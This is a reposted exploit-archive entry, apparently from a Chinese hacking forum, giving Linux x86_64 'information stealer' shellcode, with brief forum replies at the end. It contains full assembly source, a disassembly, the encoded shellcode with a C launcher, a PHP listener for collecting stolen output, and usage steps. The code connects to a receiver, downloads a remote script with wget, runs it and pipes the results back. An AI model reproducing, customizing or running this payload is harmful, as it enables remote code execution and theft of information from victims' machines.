Linux/x86_64 - Information Stealer Shellcode
/*# Title : Linux x86_64 information stealer
# Date : 23-05-2016
# Author : Roziul Hasan Khan Shifat
# Tested On : Ubuntu 14.04 LTS x86_64
# Contact : shifath12@gmail.com
*/
/*
How does this shellcode works
-----------------------------------
1. First it connects to the information reciver
2. then it download a sh script from http://192.168.30.129/pri.sh (server running on Kali linux)
3. duplicating stdout,stderr with socket descriptor
4. then it execute the script using sh
*/
/*
Note: the pri.sh file was in kali linux.the server was Kali linux
client was Ubuntu
it downloads the pri.sh from kali linux
and Executes it on Ubuntu
*/
/*
Requirements of this shellcode
--------------------------------------
1.link of pri.sh (You can Found it on http://pastebin.com/V4gudKL5 ) . this script isn't mine.I've taken it from another.I customized the script
2.reciver ip
*/
/*
How to use this shellcode
---------------------------------
1. Upload the pri.sh any site
2. TO download the pri.sh , U need to Customize the wget procedure (I've marked where to customized)
3. Customize the connect procedure for connect to the reciver where i marked
4. U need to know assembly to completed 1,2 instruction
*/
/*
Reciver
---------
To recive the Information U may Use Netcat
If U want to view the informations on Web browser , I've a php script for U. upload it any site.
<?php
if (!($sock = socket_create(AF_INET, SOCK_STREAM, 0)))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Couldn't create socket: [$errorcode] $errormsg \n");}
echo "Socket created \n\n";
if ( !socket_bind($sock, "0.0.0.0" , 1532) )
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not bind socket : [$errorcode] $errormsg \n");}
echo "Socket bind OK \n\n";
if (!socket_listen ($sock , 10))
{
$errorcode = socket_last_error();
$errormsg = socket_strerror($errorcode);
die ("Could not listen on socket : [$errorcode] $errormsg \n");}
echo "Socket listen OK \n\n\n";
echo "Waiting for incoming connections... \n";
//Accept incoming connection - This is a blocking call
$client = socket_accept($sock);
//display information about the client who is connected
if (socket_getpeername($client , $address , $port))
{
echo "Client $address : $port is now connected to us. \n";
}
//read data from the incoming socket
while(1)
{
$i= socket_recv($client,$buf, 1024000,MSG_WAITALL);
if($i<=0)
die("\nconnection closed by $address");
else
echo $buf."\n\n";
}
?>
if U this script , the reciver ip will be the website ip
BUT I RECOMMEND U TO USE NETCAT
*/
/*
Disassembly of section .text:
0000000000400080 <_start>:
400080: 6a 06 pushq $0x6
400082: 6a 01 pushq $0x1
400084: 6a 02 pushq $0x2
400086: 5f pop %rdi
400087: 5e pop %rsi
400088: 5a pop %rdx
400089: 6a 29 pushq $0x29
40008b: 58 pop %rax
40008c: 0f 05 syscall
40008e: 48 31 db xor %rbx,%rbx
400091: 48 89 c3 mov %rax,%rbx
400094: 48 31 c0 xor %rax,%rax
400097: 48 31 ff xor %rdi,%rdi
40009a: b0 39 mov $0x39,%al
40009c: 0f 05 syscall
40009e: 4d 31 c9 xor %r9,%r9
4000a1: 4c 39 c8 cmp %r9,%rax
4000a4: 74 18 je 4000be <connect>
4000a6: 6a 3c pushq $0x3c
4000a8: 58 pop %rax
4000a9: 0f 05 syscall
00000000004000ab <retry>:
4000ab: 48 31 f6 xor %rsi,%rsi
4000ae: 48 f7 e6 mul %rsi
4000b1: 56 push %rsi
4000b2: 6a 3c pushq $0x3c
4000b4: 48 89 e7 mov %rsp,%rdi
4000b7: b0 23 mov $0x23,%al
4000b9: 0f 05 syscall
4000bb: eb 01 jmp 4000be <connect>
4000bd: c3 retq
00000000004000be <connect>:
4000be: 6a 10 pushq $0x10
4000c0: 5a pop %rdx
4000c1: 53 push %rbx
4000c2: 5f pop %rdi
4000c3: 48 31 c0 xor %rax,%rax
4000c6: 50 push %rax
4000c7: 50 push %rax
4000c8: 50 push %rax
4000c9: c6 04 24 02 movb $0x2,(%rsp)
4000cd: 66 c7 44 24 02 05 fc movw $0xfc05,0x2(%rsp)
4000d4: c7 44 24 04 c0 a8 1e movl $0x811ea8c0,0x4(%rsp)
4000db: 81
4000dc: 48 89 e6 mov %rsp,%rsi
4000df: b0 2a mov $0x2a,%al
4000e1: 0f 05 syscall
4000e3: 48 31 ff xor %rdi,%rdi
4000e6: 48 39 f8 cmp %rdi,%rax
4000e9: 7c c0 jl 4000ab <retry>
4000eb: 48 31 c0 xor %rax,%rax
4000ee: 48 31 f6 xor %rsi,%rsi
4000f1: 48 ff c6 inc %rsi
4000f4: 48 89 df mov %rbx,%rdi
4000f7: b0 21 mov $0x21,%al
4000f9: 0f 05 syscall
4000fb: 48 31 c0 xor %rax,%rax
4000fe: 48 ff c6 inc %rsi
400101: 48 89 df mov %rbx,%rdi
400104: b0 21 mov $0x21,%al
400106: 0f 05 syscall
400108: 48 31 c0 xor %rax,%rax
40010b: 48 83 c0 39 add $0x39,%rax
40010f: 0f 05 syscall
400111: 48 31 ff xor %rdi,%rdi
400114: 4d 31 e4 xor %r12,%r12
400117: 49 89 c4 mov %rax,%r12
40011a: 48 39 f8 cmp %rdi,%rax
40011d: 74 59 je 400178 <wget>
40011f: 4d 31 d2 xor %r10,%r10
400122: 48 31 d2 xor %rdx,%rdx
400125: 4c 89 d6 mov %r10,%rsi
400128: 4c 89 e7 mov %r12,%rdi
40012b: 48 31 c0 xor %rax,%rax
40012e: b0 3d mov $0x3d,%al
400130: 0f 05 syscall
400132: 48 31 c0 xor %rax,%rax
400135: 48 31 d2 xor %rdx,%rdx
400138: 50 push %rax
400139: 50 push %rax
40013a: c7 04 24 2f 2f 62 69 movl $0x69622f2f,(%rsp)
400141: c7 44 24 04 6e 2f 73 movl $0x68732f6e,0x4(%rsp)
400148: 68
400149: 48 89 e7 mov %rsp,%rdi
40014c: 50 push %rax
40014d: 50 push %rax
40014e: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
400155: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
40015c: c6 44 24 06 68 movb $0x68,0x6(%rsp)
400161: 48 89 e6 mov %rsp,%rsi
400164: 52 push %rdx
400165: 56 push %rsi
400166: 57 push %rdi
400167: 48 89 e6 mov %rsp,%rsi
40016a: 48 83 c0 3b add $0x3b,%rax
40016e: 0f 05 syscall
400170: 41 51 push %r9
400172: 5f pop %rdi
400173: 6a 03 pushq $0x3
400175: 58 pop %rax
400176: 0f 05 syscall
0000000000400178 <wget>:
400178: 48 31 c0 xor %rax,%rax
40017b: 50 push %rax
40017c: 50 push %rax
40017d: 50 push %rax
40017e: c7 04 24 2f 75 73 72 movl $0x7273752f,(%rsp)
400185: c7 44 24 04 2f 62 69 movl $0x6e69622f,0x4(%rsp)
40018c: 6e
40018d: c7 44 24 08 2f 2f 77 movl $0x67772f2f,0x8(%rsp)
400194: 67
400195: 66 c7 44 24 0c 65 74 movw $0x7465,0xc(%rsp)
40019c: 48 89 e7 mov %rsp,%rdi
40019f: 50 push %rax
4001a0: 50 push %rax
4001a1: 50 push %rax
4001a2: 50 push %rax
4001a3: c7 04 24 68 74 74 70 movl $0x70747468,(%rsp)
4001aa: c7 44 24 04 3a 2f 2f movl $0x312f2f3a,0x4(%rsp)
4001b1: 31
4001b2: c7 44 24 08 39 32 2e movl $0x312e3239,0x8(%rsp)
4001b9: 31
4001ba: c7 44 24 0c 36 38 2e movl $0x332e3836,0xc(%rsp)
4001c1: 33
4001c2: c7 44 24 10 30 2e 31 movl $0x32312e30,0x10(%rsp)
4001c9: 32
4001ca: c7 44 24 14 39 2f 70 movl $0x72702f39,0x14(%rsp)
4001d1: 72
4001d2: c7 44 24 18 69 2e 73 movl $0x68732e69,0x18(%rsp)
4001d9: 68
4001da: 48 89 e6 mov %rsp,%rsi
4001dd: 48 31 d2 xor %rdx,%rdx
4001e0: 50 push %rax
4001e1: 66 c7 04 24 2d 4f movw $0x4f2d,(%rsp)
4001e7: 48 89 e1 mov %rsp,%rcx
4001ea: 50 push %rax
4001eb: 50 push %rax
4001ec: c7 04 24 2e 70 72 69 movl $0x6972702e,(%rsp)
4001f3: 66 c7 44 24 04 2e 73 movw $0x732e,0x4(%rsp)
4001fa: c6 44 24 06 68 movb $0x68,0x6(%rsp)
4001ff: 49 89 e7 mov %rsp,%r15
400202: 52 push %rdx
400203: 41 57 push %r15
400205: 51 push %rcx
400206: 56 push %rsi
400207: 57 push %rdi
400208: 48 89 e6 mov %rsp,%rsi
40020b: b0 3b mov $0x3b,%al
40020d: 0f 05 syscall
*/
/*
section .text
global _start
;-----------------
_start:
;socket()
push 6
push 1
push 2
pop rdi
pop rsi
pop rdx
push 41
pop rax
syscall
;------------------
xor rbx,rbx
mov rbx,rax ;socket descriptor
;-------------
xor rax,rax
xor rdi,rdi
mov al,57
syscall
xor r9,r9
cmp rax,r9
jz connect
push byte 60
pop rax
syscall
retry:
xor rsi,rsi
mul rsi
push rsi
push byte 60 ;1 min ( change it if U want )
mov rdi,rsp
mov al,35
syscall
jmp connect
ret
connect:
;connect()
push 16
pop rdx
push rbx
pop rdi
xor rax,rax
push rax
push rax
push rax
mov ,byte 2
;-----------------------------------
;customize these staetments
mov ,word 0xfc05 ;port 1532 ( U may change it, As U wish )
mov ,dword 0x811ea8c0 ;ip of reciver (must change it)
;--------------------------------------
mov rsi,rsp
mov al,42
syscall
xor rdi,rdi
cmp rax,rdi
jl retry
;------------dup2(sd,1)
xor rax,rax
xor rsi,rsi
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;------------dup2(sd,2)
xor rax,rax
inc rsi
mov rdi,rbx
mov al,33
syscall
;------------
;fork()
xor rax,rax
add rax,57
syscall
xor rdi,rdi
xor r12,r12
mov r12,rax ;pid
cmp rax,rdi
jz wget
;---------------
;wait4()
xor r10,r10 ;null
xor rdx,rdx ;null
mov rsi,r10 ;status
mov rdi,r12 ;pid
xor rax,rax
mov al,61
syscall
;;
;-------------------------
;execve("//bin/sh",{"//bin/sh",".pri.sh",NULL},NULL);
xor rax,rax
xor rdx,rdx
push rax
push rax
mov ,dword '//bi'
mov ,dword 'n/sh'
mov rdi,rsp
push rax
push rax
mov ,dword '.pri'
mov ,word '.s'
mov ,byte 'h'
mov rsi,rsp
push rdx
push rsi
push rdi
mov rsi,rsp
add rax,59
syscall
;--------
;close(fd)
push r9
pop rdi
push 3
pop rax
syscall
wget:
;execve("/usr/bin//wget",{"/usr/bin//wget","http ://1 92.1 68.3 0.12 9/pr i.sh","-O",".pri.sh",NULL},NULL)
xor rax,rax
push rax
push rax
push rax
mov ,dword '/usr'
mov ,dword '/bin'
mov ,dword '//wg'
mov ,word 'et'
mov rdi,rsp
push rax
push rax
push rax
push rax
;----------------------
;cusmizetd these statements for the link of pri.sh
mov ,dword 'http'
mov ,dword '://1'
mov ,dword '92.1'
mov ,dword '68.3'
mov ,dword '0.12'
mov ,dword '9/pr'
mov ,dword 'i.sh'
;------------------------
mov rsi,rsp
xor rdx,rdx
push rax
mov ,word '-O'
mov rcx,rsp
push rax
push rax
mov ,dword '.pri'
mov ,word '.s'
mov ,byte 'h'
mov r15,rsp
push rdx
push r15
push rcx
push rsi
push rdi
mov rsi,rsp
mov al,59
syscall
*/
#include<stdio.h>
#include<string.h>
char shellcode[]="\x6a\x06\x6a\x01\x6a\x02\x5f\x5e\x5a\x6a\x29\x58\x0f\x05\x48\x31\xdb\x48\x89\xc3\x48\x31\xc0\x48\x31\xff\xb0\x39\x0f\x05\x4d\x31\xc9\x4c\x39\xc8\x74\x18\x6a\x3c\x58\x0f\x05\x48\x31\xf6\x48\xf7\xe6\x56\x6a\x3c\x48\x89\xe7\xb0\x23\x0f\x05\xeb\x01\xc3\x6a\x10\x5a\x53\x5f\x48\x31\xc0\x50\x50\x50\xc6\x04\x24\x02\x66\xc7\x44\x24\x02\x05\xfc\xc7\x44\x24\x04\xc0\xa8\x1e\x81\x48\x89\xe6\xb0\x2a\x0f\x05\x48\x31\xff\x48\x39\xf8\x7c\xc0\x48\x31\xc0\x48\x31\xf6\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\xff\xc6\x48\x89\xdf\xb0\x21\x0f\x05\x48\x31\xc0\x48\x83\xc0\x39\x0f\x05\x48\x31\xff\x4d\x31\xe4\x49\x89\xc4\x48\x39\xf8\x74\x59\x4d\x31\xd2\x48\x31\xd2\x4c\x89\xd6\x4c\x89\xe7\x48\x31\xc0\xb0\x3d\x0f\x05\x48\x31\xc0\x48\x31\xd2\x50\x50\xc7\x04\x24\x2f\x2f\x62\x69\xc7\x44\x24\x04\x6e\x2f\x73\x68\x48\x89\xe7\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x48\x89\xe6\x52\x56\x57\x48\x89\xe6\x48\x83\xc0\x3b\x0f\x05\x41\x51\x5f\x6a\x03\x58\x0f\x05\x48\x31\xc0\x50\x50\x50\xc7\x04\x24\x2f\x75\x73\x72\xc7\x44\x24\x04\x2f\x62\x69\x6e\xc7\x44\x24\x08\x2f\x2f\x77\x67\x66\xc7\x44\x24\x0c\x65\x74\x48\x89\xe7\x50\x50\x50\x50\xc7\x04\x24\x68\x74\x74\x70\xc7\x44\x24\x04\x3a\x2f\x2f\x31\xc7\x44\x24\x08\x39\x32\x2e\x31\xc7\x44\x24\x0c\x36\x38\x2e\x33\xc7\x44\x24\x10\x30\x2e\x31\x32\xc7\x44\x24\x14\x39\x2f\x70\x72\xc7\x44\x24\x18\x69\x2e\x73\x68\x48\x89\xe6\x48\x31\xd2\x50\x66\xc7\x04\x24\x2d\x4f\x48\x89\xe1\x50\x50\xc7\x04\x24\x2e\x70\x72\x69\x66\xc7\x44\x24\x04\x2e\x73\xc6\x44\x24\x06\x68\x49\x89\xe7\x52\x41\x57\x51\x56\x57\x48\x89\xe6\xb0\x3b\x0f\x05"; /* insert shellcode here */
int main()
{
printf("shellcode length %ld",( unsigned long ) strlen(shellcode));
( * (int(*)()) shellcode) ();
} 谢谢楼主的分享 我是来水经验的…… 非常感谢 支持中国红客联盟(ihonker.org) 支持中国红客联盟(ihonker.org) 支持中国红客联盟(ihonker.org) 支持,看起来还是可以的